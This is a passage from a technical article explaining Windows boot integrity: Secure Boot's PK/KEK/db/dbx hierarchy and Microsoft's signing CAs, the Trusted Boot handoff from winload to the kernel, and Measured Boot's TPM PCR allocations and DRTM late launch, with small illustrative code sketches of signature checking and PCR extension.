&lt;p&gt;The conclusion is the part most engineers skip. By the time &lt;code&gt;bootmgfw.efi&lt;/code&gt; is verified, several megabytes of DXE-phase code have already executed. Anything that compromises the DXE compromises Secure Boot from below: the verifier itself is now the attacker&apos;s code. That is the precondition that LogoFAIL exploits, and it is the reason &quot;Secure Boot starts at the OS loader&quot; is the wrong mental model.&lt;/p&gt;
&lt;p&gt;NIST recognised the structural problem early. NIST Special Publication 800-147 &lt;em&gt;BIOS Protection Guidelines&lt;/em&gt; (April 2011) [@nist-sp-800-147] articulated the BIOS-update-signing baseline two years before Boot Guard shipped a hardware-rooted answer. SP 800-147 said only that firmware updates must be signed; it did not say &lt;em&gt;who&lt;/em&gt; must verify the signing key. Boot Guard and PSB were the hardware-rooted answer to that gap, with the OEM holding the verification key in OTP fuses.&lt;/p&gt;
&lt;p&gt;Now we have a place to put a verifier. The next question is &lt;em&gt;what&lt;/em&gt; it verifies, and &lt;em&gt;who&lt;/em&gt; signed the allowlist.&lt;/p&gt;
&lt;h2&gt;4. Secure Boot itself: PK, KEK, db, dbx, and the Microsoft monoculture&lt;/h2&gt;
&lt;p&gt;Secure Boot is four UEFI variables, one Authenticode hash per binary, and one centralised root of trust. The technical content of this section is not the hard part. The social and operational content -- &lt;em&gt;who&lt;/em&gt; holds which key, and &lt;em&gt;what happens when a signed binary becomes vulnerable&lt;/em&gt; -- is the rest of the article.&lt;/p&gt;
&lt;p&gt;The four authenticated UEFI variables, defined in UEFI 2.3.1 (April 2011) and refined through the current 2.11 specification (December 16, 2024) [@oem-secure-boot]:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;PK&lt;/strong&gt; -- the Platform Key. The OEM holds the private half. Whoever holds PK can rewrite KEK, db, and dbx; whoever holds PK can &lt;em&gt;turn Secure Boot off&lt;/em&gt; by replacing PK with a key it does not actually own.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;KEK&lt;/strong&gt; -- the Key Exchange Key. Both the OEM and Microsoft hold KEKs. KEK is the trust anchor for db and dbx updates. A KEK-signed update can add or remove entries in db and dbx without touching PK.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;db&lt;/strong&gt; -- the signature database. This is the allowlist: hashes the firmware will accept, plus certificates whose signers it will accept. db typically contains a small handful of entries.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;dbx&lt;/strong&gt; -- the forbidden signatures database. The denylist: hashes and certs the firmware must refuse, even if they would otherwise pass db.&lt;/li&gt;
&lt;/ul&gt;

Four EFI variables defined by the UEFI specification that together form Secure Boot&apos;s trust hierarchy. Each variable is *authenticated*: any update must be signed by a key one rung up the hierarchy. PK signs updates to itself and KEK; KEK signs updates to db and dbx (a PK holder can replace KEK and thereby control db and dbx indirectly). Microsoft requires the Microsoft Corporation KEK CA to be present in KEK on every Windows-certified PC, so that Microsoft can push db and dbx updates without OEM cooperation per device.
&lt;p&gt;The verification algorithm runs every time UEFI calls &lt;code&gt;LoadImage()&lt;/code&gt; on a PE/COFF binary, in this order:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Hash the PE/COFF image. The Authenticode digest excludes the signature directory and the checksum field, so the hash is computed over the parts of the image that should not change between signing and loading [@ms-pe-format].&lt;/li&gt;
&lt;li&gt;If the hash matches a hash in dbx, reject.&lt;/li&gt;
&lt;li&gt;Else if the signer&apos;s certificate chains to a certificate in dbx, reject.&lt;/li&gt;
&lt;li&gt;Else if the hash matches an entry in db, accept. Else if the signer chains to a certificate in db, accept.&lt;/li&gt;
&lt;li&gt;Else, reject.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Microsoft&apos;s WHCP requires firmware components to be signed with at least RSA-2048 and SHA-256 [@oem-secure-boot]. That floor is generous by 2026 standards but has held without serious controversy since the original UEFI 2.3.1 release.&lt;/p&gt;

flowchart TD
    L[&quot;LoadImage(image)&quot;] --&amp;gt; H[&quot;Compute Authenticode hash&quot;]
    H --&amp;gt; D1{&quot;Hash in dbx?&quot;}
    D1 -- yes --&amp;gt; R[&quot;REJECT&quot;]
    D1 -- no --&amp;gt; D2{&quot;Signer chains to dbx cert?&quot;}
    D2 -- yes --&amp;gt; R
    D2 -- no --&amp;gt; D3{&quot;Hash in db, OR signer chains to db cert?&quot;}
    D3 -- yes --&amp;gt; A[&quot;ACCEPT (load image)&quot;]
    D3 -- no --&amp;gt; R
&lt;p&gt;The de facto roots for x86 PCs are &lt;em&gt;two&lt;/em&gt; Microsoft-rooted certificate authorities, both pre-trusted in db on essentially every certified Windows-class system: the &lt;strong&gt;Microsoft Windows Production PCA 2011&lt;/strong&gt;, which signs Microsoft&apos;s own Windows boot binaries (&lt;code&gt;bootmgfw.efi&lt;/code&gt;, &lt;code&gt;bootmgr.efi&lt;/code&gt;, &lt;code&gt;winload.efi&lt;/code&gt;), and the &lt;strong&gt;Microsoft Corporation UEFI CA 2011&lt;/strong&gt;, which signs third-party UEFI binaries -- Linux&apos;s &lt;code&gt;shim&lt;/code&gt;, option ROMs, and third-party firmware drivers [@sbat-shim, @oem-secure-boot]. The rhboot/shim project documents the arrangement: every certified PC is &quot;typically configured to trust 2 authorities for signing UEFI boot code, the Microsoft UEFI Certificate Authority (CA) and Windows CA&quot; [@sbat-shim]. The fact that &lt;em&gt;both&lt;/em&gt; are Microsoft-rooted is the reason Secure Boot, as deployed, and &quot;Microsoft is the gatekeeper of which operating systems may boot&quot; are operationally the same thing. The UEFI Forum&apos;s specification did not require that monoculture. The economics did. There are exactly two certificate authorities every OEM is willing to trust by default, and both belong to the operating-system vendor whose installer media every OEM ships.&lt;/p&gt;

The X.509 certificate authorities Microsoft uses for Secure Boot. Two CAs from the 2011 family ship pre-installed in db on essentially every Windows-certified PC: the **Microsoft Windows Production PCA 2011** signs Microsoft&apos;s own Windows boot binaries, and the **Microsoft Corporation UEFI CA 2011** signs third-party UEFI binaries (Linux&apos;s `shim`, option ROMs, third-party firmware drivers). Both 2011 certificates begin expiring in late June 2026. The **Windows UEFI CA 2023** is their successor; its industry-wide enrolment began in May 2023 with the KB5025885 program responding to CVE-2023-24932 and is still rolling out under phased automatic enrolment via monthly Windows Updates as of 2026.

Linux&apos;s path through Secure Boot runs through `shim.efi`, a small bootloader Matthew Garrett released on November 30, 2012 -- his last day at Red Hat. The trick is structural: Microsoft signs `shim` itself; `shim` is shipped on the install media of every major Linux distribution; once running, `shim` validates a distribution-signed `grubx64.efi` (or kernel) using a key the distribution embeds, *or* a Machine Owner Key (MOK) the user has enrolled at install time. Garrett credits the MOK design to engineers at SUSE. The arrangement is the open-source community&apos;s pressure valve against the Microsoft monoculture: Linux still boots on Secure Boot hardware because Microsoft signs one bootloader that delegates trust to a community-managed key store. It also explains why Linux dual-boot installs began breaking after May 2023 -- the certificates that signed older copies of `shim` are being rotated out.
&lt;p&gt;The dbx variable carries the operational weight of the system. If a signed bootloader is found to be vulnerable, the only blocking remedy is to add its hash to dbx. dbx lives in NV-RAM; on commodity Windows PCs the storage budget is roughly 32 KB total [@sbat-shim].The 32 KB figure comes from the rhboot/shim project&apos;s SBAT documentation, which notes that the BootHole disclosure of July 2020 -- a single GRUB vulnerability requiring revocation of three certificates and roughly 150 image hashes -- consumed approximately 10 KB of dbx in one event. That is one third of the available capacity, used up by one CVE. Linux distributions and Windows share the same dbx region. A botched update can refuse to validate a bootloader that the platform actually needs, and there is no remote rollback for a brick-on-write to dbx. Section 9 will show what happens when dbx revocation lags behind a CVE.&lt;/p&gt;
&lt;p&gt;The CA-2023 transition is therefore not a routine certificate rotation. The original 2011 certificates begin expiring in late June 2026. Microsoft&apos;s industry-wide Windows UEFI CA 2023 rollout started May 2023 with KB5025885, the patch advisory that paired with CVE-2023-24932, and is on track to be, in Microsoft&apos;s own framing, one of the largest coordinated security maintenance efforts the Windows install base has ever seen [@kb5025885]. The phasing, as published: enrol the new CA in db; sign new bootloaders with it; enrol new dbx entries to revoke older signed-but-vulnerable binaries; finally, revoke the 2011 CA. The published cautionary text is unambiguous: once the irreversible mitigation step is enabled on a device, &quot;it cannot be reverted if you continue to use Secure Boot on that device. Even reformatting of the disk will not remove the revocations if they have already been applied&quot; [@kb5025885].&lt;/p&gt;
&lt;p&gt;{`
// Sketch of what UEFI does for every PE/COFF binary it loads.
function loadImage(image, db, dbx) {
  const hash = authenticodeHash(image);
  const signerCert = parseSignerCert(image);&lt;/p&gt;
&lt;p&gt;  if (dbx.hashes.includes(hash)) return { ok: false, reason: &quot;dbx hash&quot; };
  if (signerCert &amp;amp;&amp;amp; chainsTo(signerCert, dbx.certs)) {
    return { ok: false, reason: &quot;dbx cert&quot; };
  }
  if (db.hashes.includes(hash)) return { ok: true, reason: &quot;db hash&quot; };
  if (signerCert &amp;amp;&amp;amp; chainsTo(signerCert, db.certs)) {
    return { ok: true, reason: &quot;db cert&quot; };
  }
  return { ok: false, reason: &quot;not in db&quot; };
}&lt;/p&gt;
&lt;p&gt;const decision = loadImage(
  { hash: &quot;abc&quot;, signer: &quot;Microsoft Windows Production PCA 2011&quot; },
  { hashes: [], certs: [&quot;Microsoft Windows Production PCA 2011&quot;, &quot;Microsoft Corporation UEFI CA 2011&quot;] },
  { hashes: [], certs: [] }
);
console.log(decision);
`}&lt;/p&gt;
&lt;p&gt;Verification is a one-shot signature check at firmware boundaries. The chain still has to extend all the way to userland. Microsoft&apos;s name for what comes next is &lt;em&gt;Trusted Boot&lt;/em&gt;. And here is the thing the patch-cadence narrative fails to convey: &lt;em&gt;patched is not revoked&lt;/em&gt;. Microsoft can ship a fixed &lt;code&gt;bootmgfw.efi&lt;/code&gt; next month. It cannot delete the old, vulnerable, validly-signed copy from every machine in the world. As long as the old binary&apos;s hash is not in dbx, Secure Boot will load it.&lt;/p&gt;
&lt;h2&gt;5. Trusted Boot: bootmgfw.efi, winload.efi, and the Windows-specific chain&lt;/h2&gt;
&lt;p&gt;Secure Boot can answer &quot;is this &lt;code&gt;.efi&lt;/code&gt; file in our allowlist?&quot; It cannot answer &quot;is every kernel-mode driver loaded after this &lt;code&gt;.efi&lt;/code&gt; file in our allowlist?&quot; That second question is what Trusted Boot exists to answer.&lt;/p&gt;

Microsoft&apos;s term for the post-firmware portion of the verified boot chain. UEFI Secure Boot validates `bootmgfw.efi`. `bootmgfw.efi` validates `winload.efi`. `winload.efi` validates `ntoskrnl.exe`, the Hardware Abstraction Layer, every boot-start driver, and the ELAM driver. `ntoskrnl.exe` validates every driver loaded thereafter against the active code-integrity policy. Trusted Boot is therefore the Microsoft policy enforcement chain layered *on top of* Secure Boot&apos;s firmware-side verifier; it is what extends the signature check past the operating-system loader into kernel mode.
&lt;p&gt;The mechanics, after the firmware hands control to &lt;code&gt;bootmgfw.efi&lt;/code&gt;: the boot manager reads the Boot Configuration Data store, locates &lt;code&gt;winload.efi&lt;/code&gt; (or &lt;code&gt;winresume.efi&lt;/code&gt; for resuming from hibernation), and enforces the boot-time integrity policy on every component it loads [@ms-trusted-boot]. The verifier handoff, however, is more interesting than the Microsoft Learn paragraph suggests. It runs in three stages.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Stage A: &lt;code&gt;winload&lt;/code&gt;&apos;s in-image &lt;code&gt;bootlib&lt;/code&gt; verifier.&lt;/strong&gt; &lt;code&gt;winload.efi&lt;/code&gt; does not call kernel-mode &lt;code&gt;ci.dll&lt;/code&gt; to validate boot images. It carries its own boot-time code-integrity verifier inside the &lt;code&gt;bootlib&lt;/code&gt; boot library shared with &lt;code&gt;bootmgr&lt;/code&gt;. Reverse-engineering work on the Elysium bootkit research framework reconstructed the call chain inside &lt;code&gt;winload.efi&lt;/code&gt;: &lt;code&gt;OslLoadDrivers&lt;/code&gt; -&amp;gt; &lt;code&gt;OslLoadImage&lt;/code&gt; -&amp;gt; &lt;code&gt;LdrpLoadImage&lt;/code&gt; -&amp;gt; &lt;code&gt;BlImgLoadPEImageEx&lt;/code&gt; -&amp;gt; &lt;code&gt;ImgpLoadPEImage&lt;/code&gt;, with &lt;code&gt;ImgpValidateImageHash&lt;/code&gt; performing the Authenticode digest check against the trusted boot policy embedded in &lt;code&gt;winload&lt;/code&gt; itself [@elysium-bootkit]. Boot-start drivers, &lt;code&gt;ntoskrnl.exe&lt;/code&gt;, the Hardware Abstraction Layer, and the ELAM driver all flow through this chain before kernel mode is alive to do anything about it.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Stage B: handoff via &lt;code&gt;LOADER_PARAMETER_EXTENSION&lt;/code&gt;.&lt;/strong&gt; When &lt;code&gt;winload.efi&lt;/code&gt; is done validating, it has to hand the validated state across the loader-kernel boundary. The mechanism is &lt;code&gt;LOADER_PARAMETER_EXTENSION&lt;/code&gt; (LPE), the under-documented structure that hangs off the &lt;code&gt;LOADER_PARAMETER_BLOCK&lt;/code&gt; whose address the loader passes to the kernel.The LPE structure has been Microsoft-internal in every shipping Windows release; the public reference Geoff Chappell maintains is the canonical third-party reverse-engineering of its layout across Windows builds. New fields are added at the tail of the structure when shipping features need to communicate state across the loader/kernel boundary. The fact that Smart App Control&apos;s CI state needed two new LPE fields is a small but telling indicator of how much policy state Trusted Boot now carries. Geoff Chappell&apos;s reference describes the LPE as &quot;part of the mechanism through which the kernel and HAL learn the initialisation data that was gathered by the loader&quot; [@geoffchappell-lpe]. The structure has grown across Windows builds; with Smart App Control on Windows 11 22H2, two new fields -- &lt;code&gt;CodeIntegrityData&lt;/code&gt; and &lt;code&gt;CodeIntegrityDataSize&lt;/code&gt; -- were added so that the loader-validated CI state, including the active SiPolicy and the pre-validated boot-start driver list, would survive the handoff intact [@n4r1b-sac].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Stage C: kernel-mode &lt;code&gt;ci.dll&lt;/code&gt; continuation.&lt;/strong&gt; Only after &lt;code&gt;ntoskrnl.exe&lt;/code&gt; is itself running does the kernel-mode &lt;code&gt;ci.dll&lt;/code&gt; come into play. It picks up the SiPolicy state from the LPE and continues the same code-integrity policy enforcement on every kernel-mode image loaded after the loader&apos;s window closes -- principally via the &lt;code&gt;Se&lt;/code&gt;-prefixed validation routines that the kernel&apos;s image-load notification routines call into. From that point, every subsequent driver load goes through the same code-integrity gate. The &lt;code&gt;bootlib&lt;/code&gt; -&amp;gt; LPE -&amp;gt; kernel-mode &lt;code&gt;ci.dll&lt;/code&gt; decomposition is the underlying mechanism Microsoft&apos;s high-level documentation collapses into a single sentence:&lt;/p&gt;

The Windows bootloader verifies the digital signature of the Windows kernel before loading it. The Windows kernel, in turn, verifies every other component of the Windows startup process, including boot drivers, startup files, and your anti-malware product&apos;s early-launch anti-malware (ELAM) driver. -- Microsoft Learn [@ms-trusted-boot]
&lt;p&gt;Trusted Boot is therefore the &lt;em&gt;Windows-specific&lt;/em&gt; extension of the verifier into kernel mode. UEFI Secure Boot is platform-agnostic; it ships in db on every certified PC. Trusted Boot is the policy engine that reuses the firmware-side trust anchor and walks it forward into &lt;code&gt;ntoskrnl.exe&lt;/code&gt;. The mechanism for &lt;em&gt;how&lt;/em&gt; SiPolicy is parsed, how publisher rules are evaluated, and how the kernel&apos;s code-integrity state machine handles attempts to load binaries outside policy, lives in this article&apos;s App Identity sibling and is not redefined here [@app-identity-sibling].&lt;/p&gt;
&lt;p&gt;There is a failure mode you can see coming. If the trusted boot manager itself is signed but vulnerable, the chain still validates, the policy still enforces, and the entire defence is bypassed. The signature is correct; the code path is what is wrong. Section 9 will show what happens when an older &lt;code&gt;bootmgfw.efi&lt;/code&gt; revision contains a memory-map manipulation flaw that lets attacker-controlled data flow before the SiPolicy enforcement engine is up. That is the BlackLotus failure. For now, hold the framing: Trusted Boot&apos;s guarantee is &quot;every kernel-mode component has a valid Microsoft signature.&quot; It is not &quot;every Microsoft signature in this chain corresponds to a binary that is itself secure.&quot;&lt;/p&gt;
&lt;p&gt;Verification can stop loading bad code. It cannot prove that good code was loaded. For that we need a parallel rail.&lt;/p&gt;
&lt;h2&gt;6. Measured Boot: SRTM, the TPM event log, and PCR 0-7+11 in order&lt;/h2&gt;
&lt;p&gt;Verification stops bad code from running. &lt;em&gt;Measurement&lt;/em&gt; makes sure you can prove, after the fact, what code did run. The two rails do not protect against the same thing. This is the article&apos;s mechanism-densest section, and the place a few key terms have to be exactly right.&lt;/p&gt;

A boot-time chain of cryptographic measurements anchored in a Core Root of Trust for Measurement (CRTM): a code segment in the platform&apos;s flash that is implicitly trusted because it runs first and is immutable, and that performs the first measurement into the TPM before any flexible code runs. SRTM extends one PCR per component as the chain unfolds, producing a tamper-evident log of exactly which firmware, boot manager, and kernel the platform launched. The measurement does not stop bad code; it records what code ran so a verifier can decide later.
&lt;p&gt;The TPM extend primitive is the cryptographic core. The TPM never overwrites a PCR. When the platform asks the TPM to extend PCR &lt;code&gt;N&lt;/code&gt; with a measurement &lt;code&gt;m&lt;/code&gt;, the TPM does:&lt;/p&gt;
&lt;p&gt;$$\mathrm{PCR}[N] := H\bigl(\mathrm{PCR}[N] ,\Vert, m\bigr)$$&lt;/p&gt;
&lt;p&gt;where &lt;code&gt;H&lt;/code&gt; is the bank&apos;s hash algorithm (SHA-1 on TPM 1.2; SHA-1 and SHA-256 banks both required by the TCG PC Client Platform Firmware Profile on TPM 2.0; SHA-384 and SHA3 banks optional and present on some newer parts) and &lt;code&gt;||&lt;/code&gt; is byte concatenation [@syss-bitpixie]. The TPM 2.0 specification was finalised by the Trusted Computing Group on 9 April 2014 [@wp-tpm]. The mechanism guarantees that any later PCR value is a function of every prior measurement in the order it was extended -- you cannot rewind, and you cannot reorder. The TPM 2.0 PC Client profile specifies at least 24 PCRs, the first 16 of which are append-only and non-resettable until the platform itself is reset [@syss-bitpixie]. The full TPM &lt;code&gt;extend&lt;/code&gt; mechanics are covered in this article&apos;s TPM sibling; we do not redefine them here [@tpm-sibling].&lt;/p&gt;
&lt;p&gt;The PCR allocation, per the TCG PC Client Platform Firmware Profile, corroborated against the SySS Bitpixie writeup [@syss-bitpixie] and Microsoft Learn [@ms-secure-boot-process]:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;PCR&lt;/th&gt;
&lt;th&gt;Extended by&lt;/th&gt;
&lt;th&gt;What it measures&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;td&gt;CRTM, SEC, PEI&lt;/td&gt;
&lt;td&gt;SRTM core firmware code (BIOS/UEFI)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;PEI / DXE&lt;/td&gt;
&lt;td&gt;Host platform configuration (CPU microcode, NVRAM settings)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;DXE&lt;/td&gt;
&lt;td&gt;UEFI driver and application code (option ROMs)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;DXE&lt;/td&gt;
&lt;td&gt;UEFI driver and application configuration / data&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;DXE / BDS&lt;/td&gt;
&lt;td&gt;Hashes of all boot managers in the boot path; &lt;code&gt;bootmgfw.efi&lt;/code&gt; lands here&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;BDS&lt;/td&gt;
&lt;td&gt;Boot manager code config and data; GPT; boot attempts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;DXE / OEM&lt;/td&gt;
&lt;td&gt;Host platform manufacturer specific&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;DXE&lt;/td&gt;
&lt;td&gt;State of Secure Boot: PK, KEK, db, dbx hashes; the &lt;code&gt;SecureBoot&lt;/code&gt; variable; signing certificate of every loaded image&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;11&lt;/td&gt;
&lt;td&gt;&lt;code&gt;bootmgfw.efi&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;BitLocker access control: locked after VMK is obtained&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

sequenceDiagram
    participant CRTM
    participant SEC
    participant DXE
    participant BMGR as bootmgfw.efi
    participant TPM as TPM PCRs
    CRTM-&amp;gt;&amp;gt;TPM: extend PCR[0] with SRTM hash
    SEC-&amp;gt;&amp;gt;TPM: extend PCR[1] with platform config
    DXE-&amp;gt;&amp;gt;TPM: extend PCR[2] with option-ROM code
    DXE-&amp;gt;&amp;gt;TPM: extend PCR[7] with Secure Boot state
    DXE-&amp;gt;&amp;gt;TPM: extend PCR[4] with bootmgfw.efi hash
    BMGR-&amp;gt;&amp;gt;TPM: extend PCR[4] with winload.efi hash
    BMGR-&amp;gt;&amp;gt;TPM: extend PCR[7] with signer cert of winload
    BMGR-&amp;gt;&amp;gt;TPM: extend PCR[11] with BitLocker access flag
&lt;p&gt;PCR[7] deserves a section of its own. On modern Windows, &lt;em&gt;PCR[7] is the canonical seal target&lt;/em&gt; for BitLocker. A protector sealed to PCR[7] unwraps cleanly across firmware updates, microcode revisions, and option-ROM changes, because PCR[7] reflects only the Secure Boot state -- the keys in PK, KEK, db, dbx, the &lt;code&gt;SecureBoot&lt;/code&gt; variable, and the signing certificates of loaded images. PCR[0..4] are too volatile for sealing on a real fleet because every BIOS update changes them. PCR[7] changes only when Secure Boot policy itself changes [@syss-bitpixie, @ms-system-guard]. The full BitLocker key hierarchy is covered in this article&apos;s BitLocker sibling [@bitlocker-sibling]; here we are placing PCR[7] in the chain.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Verification stops bad code. Measurement records what code ran. Neither rail is sufficient alone. Modern Windows boot integrity needs both rails reaching the same place -- the kernel and the Secure Kernel -- before user-mode runtime defences take over.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The TCG event log makes the measurement chain useful for more than sealing. Every &lt;code&gt;extend&lt;/code&gt; is logged through the TCG2 EFI Protocol with the hash, the algorithm, and a description of what was measured. A verifier (BitLocker locally; an attestation service remotely) can replay the log to recover &lt;em&gt;which binary hashed to which PCR value&lt;/em&gt;, and -- if the replay does not match the live PCRs -- detect tampering. Microsoft Learn describes exactly that path: &quot;the PC&apos;s firmware logs the boot process, and Windows can send it to a trusted server that can objectively assess the PC&apos;s health&quot; [@ms-secure-boot-process].&lt;/p&gt;
&lt;p&gt;There is a second root of measurement that sidesteps the firmware-trust regress entirely. DRTM -- Dynamic Root of Trust for Measurement -- is late-launched after firmware boot, via Intel TXT&apos;s &lt;code&gt;GETSEC[SENTER]&lt;/code&gt; instruction or AMD&apos;s &lt;code&gt;SKINIT&lt;/code&gt;. It resets PCR[17..22] at locality 4 and re-anchors a measurement chain in a vendor-controlled allowlistable module that does not depend on the DXE phase having been clean [@wp-txt, @ms-system-guard]. Microsoft documents the motivation in plain language:&lt;/p&gt;

There are thousands of PC vendors that produce many models with different UEFI BIOS versions. This creates an incredibly large number of SRTM measurements upon bootup. [@ms-system-guard]
&lt;p&gt;The argument: SRTM measurements are platform-specific. An attestation service that wants to know whether a given device booted clean must hold an allowlist of SRTM measurements covering N OEMs * M models * K firmware revisions. The allowlist explodes; the blocklist is asymmetric in the attacker&apos;s favour. DRTM collapses the allowlist by defining one small, well-known late-launched measurement chain that the attestation service can recognise across every Secured-core PC.&lt;/p&gt;

A late-launched measurement chain that re-anchors trust *after* firmware boot, by using a CPU instruction (`GETSEC[SENTER]` on Intel, `SKINIT` on AMD) to reset a designated set of PCRs and execute a small, vendor-controlled measured launch module. DRTM is Microsoft&apos;s answer to the SRTM allowlist explosion. It powers System Guard Secure Launch, which Windows 10 1809 introduced; on supported hardware, the late-launched module brings up the hypervisor and Secure Kernel from a trust anchor that the firmware cannot influence.
&lt;p&gt;The DRTM PCR allocation is parallel to SRTM but lives in a separate range, PCR[17..22], reset only by the late-launch event. Per the TCG PC Client Platform Firmware Profile (corroborated against the Wikipedia Trusted Execution Technology mirror, since TCG returns HTTP 403 to non-browser fetches) and Microsoft&apos;s System Guard documentation [@wp-txt, @ms-system-guard]:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;PCR&lt;/th&gt;
&lt;th&gt;Reset by&lt;/th&gt;
&lt;th&gt;What it measures&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;17&lt;/td&gt;
&lt;td&gt;&lt;code&gt;GETSEC[SENTER]&lt;/code&gt; / &lt;code&gt;SKINIT&lt;/code&gt; at locality 4&lt;/td&gt;
&lt;td&gt;DRTM-event measurement and Launch Control Policy hash extended by the SINIT ACM (Intel TXT) or the Secure Loader block hash (&lt;code&gt;SKINIT&lt;/code&gt; on AMD)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;18&lt;/td&gt;
&lt;td&gt;locality 4&lt;/td&gt;
&lt;td&gt;Trusted-OS start-up code (the Measured Launch Environment itself)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;19&lt;/td&gt;
&lt;td&gt;locality 4&lt;/td&gt;
&lt;td&gt;Trusted-OS measurement, e.g., OS configuration&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;20&lt;/td&gt;
&lt;td&gt;locality 4&lt;/td&gt;
&lt;td&gt;Trusted-OS measurement, e.g., OS kernel and other code&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;21&lt;/td&gt;
&lt;td&gt;locality 4&lt;/td&gt;
&lt;td&gt;Reserved for and defined by the Trusted OS&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;22&lt;/td&gt;
&lt;td&gt;locality 4&lt;/td&gt;
&lt;td&gt;Reserved for and defined by the Trusted OS&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The reset semantics are the load-bearing detail. PCR[0..16] are append-only after platform reset; they cannot be cleared without rebooting the box. PCR[17..22] are different: they can be reset &lt;em&gt;during runtime&lt;/em&gt;, but only by an atomic late-launch event. That asymmetry is what makes DRTM&apos;s anchor verifiable [@wp-txt, @syss-bitpixie].&lt;/p&gt;
&lt;p&gt;The mechanism that enforces it is &lt;em&gt;TPM locality&lt;/em&gt;. Locality is a side-channel attribute on every TPM command identifying which entity issued the request. Locality 0 is general OS and application traffic. &lt;strong&gt;Locality 4 is assertable only by the CPU itself&lt;/strong&gt;, during the atomic &lt;code&gt;GETSEC[SENTER]&lt;/code&gt; (Intel TXT) or &lt;code&gt;SKINIT&lt;/code&gt; (AMD) sequence. The TPM accepts a &lt;code&gt;Reset&lt;/code&gt; of PCR[17..22] only when the request arrives tagged with locality 4. No software running outside the late-launch instruction can forge that tag. That is the structural reason DRTM&apos;s late-launch is verifiable rather than forgeable [@wp-txt].&lt;/p&gt;
&lt;p&gt;The asymmetry pays off for an attestation service. If a remote verifier reads PCR[17] and finds it still at its power-on value of all ones (&lt;code&gt;0xFF...FF&lt;/code&gt;), DRTM did not happen on this boot. If it reads PCR[17] and finds it equal to the iterated extend $\mathrm{PCR}[17] := H\bigl(0 ,\Vert, H(\text{SINIT_ACM_hash} ,\Vert, \text{LCP_hash})\bigr)$ (or, more accurately, the chain of extends the SINIT ACM logged), a CPU-vendor-signed SINIT Authenticated Code Module seeded the chain, and the value is recomputable by the verifier from the published, signed SINIT ACM and the platform&apos;s Launch Control Policy [@wp-txt, @ms-system-guard]. The verifier&apos;s allowlist for DRTM measurements is bounded by the small set of CPU-vendor-signed measured-launch modules in circulation (SINIT ACMs on Intel TXT; the Secure Loader block measured directly by &lt;code&gt;SKINIT&lt;/code&gt; on AMD) -- not by the cross-product of OEMs, models, and firmware revisions.&lt;/p&gt;
&lt;p&gt;{`
// Demonstrates the PCR extend formula:
//   PCR[N] := H( PCR[N] || measurement )
// Run it to see how PCR[4] would evolve as bootmgfw, winload, and ntoskrnl
// hashes are extended one after another.&lt;/p&gt;
&lt;p&gt;const sha256 = (buf) =&amp;gt; createHash(&apos;sha256&apos;).update(buf).digest();&lt;/p&gt;
&lt;p&gt;function extend(pcrHex, measurementHex) {
  const pcr = Buffer.from(pcrHex, &apos;hex&apos;);
  const m = Buffer.from(measurementHex, &apos;hex&apos;);
  return sha256(Buffer.concat([pcr, m])).toString(&apos;hex&apos;);
}&lt;/p&gt;
&lt;p&gt;// Real PCRs start as 32 bytes of zero on a TPM 2.0 reset.
let pcr4 = &apos;00&apos;.repeat(32);&lt;/p&gt;
&lt;p&gt;const measurements = [
  { name: &apos;bootmgfw.efi&apos;, hash: &apos;aa&apos;.repeat(32) },
  { name: &apos;winload.efi&apos;,  hash: &apos;bb&apos;.repeat(32) },
  { name: &apos;ntoskrnl.exe&apos;, hash: &apos;cc&apos;.repeat(32) },
];&lt;/p&gt;
&lt;p&gt;for (const m of measurements) {
  pcr4 = extend(pcr4, m.hash);
  console.log(`after ${m.name}: PCR[4] = ${pcr4.slice(0, 16)}...`);
}
`}&lt;/p&gt;
&lt;p&gt;We now have two rails of trust ready to converge in the kernel. The next thing the kernel has to do is hand control to defenders that can keep the chain alive into runtime.&lt;/p&gt;
&lt;h2&gt;7. ELAM, the kernel, and the Secure Kernel bring-up: where the chain ends&lt;/h2&gt;
